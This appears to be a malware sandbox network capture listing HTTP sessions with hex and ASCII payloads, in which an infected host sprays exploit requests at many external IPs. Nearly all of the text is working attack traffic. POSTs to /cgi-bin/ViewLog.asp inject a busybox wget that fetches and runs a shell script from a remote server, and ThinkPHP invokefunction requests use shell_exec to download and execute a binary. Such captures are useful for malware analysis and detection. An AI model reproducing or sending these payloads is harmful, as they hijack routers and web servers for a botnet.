                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 32 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 32 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>Apache Tomcat/6.0.29 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource (/cgi-bin/ViewLog.asp) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.29</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        491192.168.2.235716662.29.87.928080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:13.387334108 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        492192.168.2.234409862.29.66.278080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:13.389030933 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        493192.168.2.235612031.200.64.798080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:13.400655031 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        494192.168.2.233661894.121.59.578080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:13.400785923 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        495192.168.2.234452094.122.67.2498080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:13.400918007 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        496192.168.2.234223088.198.84.9780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:13.412719011 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:13.717952013 CEST321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.20.1
                                                        Date: Sun, 14 Apr 2024 14:34:56 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        497192.168.2.234562888.221.5.18480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:13.418277025 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:13.729594946 CEST581INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 359
                                                        Expires: Sun, 14 Apr 2024 14:36:13 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:13 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 64 65 36 36 35 35 66 26 23 34 36 3b 31 37 31 33 31 30 35 33 37 33 26 23 34 36 3b 31 65 61 32 65 66 62 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 62 64 65 36 36 35 35 66 26 23 34 36 3b 31 37 31 33 31 30 35 33 37 33 26 23 34 36 3b 31 65 61 32 65 66 62 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;bde6655f&#46;1713105373&#46;1ea2efb<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;bde6655f&#46;1713105373&#46;1ea2efb</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        498192.168.2.234712088.212.46.19080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:13.429717064 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:15.099148989 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:17.050909996 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:21.178437948 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:29.113217115 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:44.727217913 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:16.210812092 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        499192.168.2.234109495.111.232.568080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:15.065268040 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:15.376732111 CEST88INHTTP/1.0 400 Bad Request
                                                        Data Raw: 43 6c 69 65 6e 74 20 73 65 6e 74 20 61 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 74 6f 20 61 6e 20 48 54 54 50 53 20 73 65 72 76 65 72 2e 0a
                                                        Data Ascii: Client sent an HTTP request to an HTTPS server.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        500192.168.2.235317831.136.142.118080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:15.072293043 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:16.059082985 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:18.042768955 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:22.202208042 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:30.137082100 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:46.006999969 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:18.258517981 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        501192.168.2.234763831.136.63.358080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:15.072685957 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:16.059082985 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:18.042792082 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:22.202195883 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
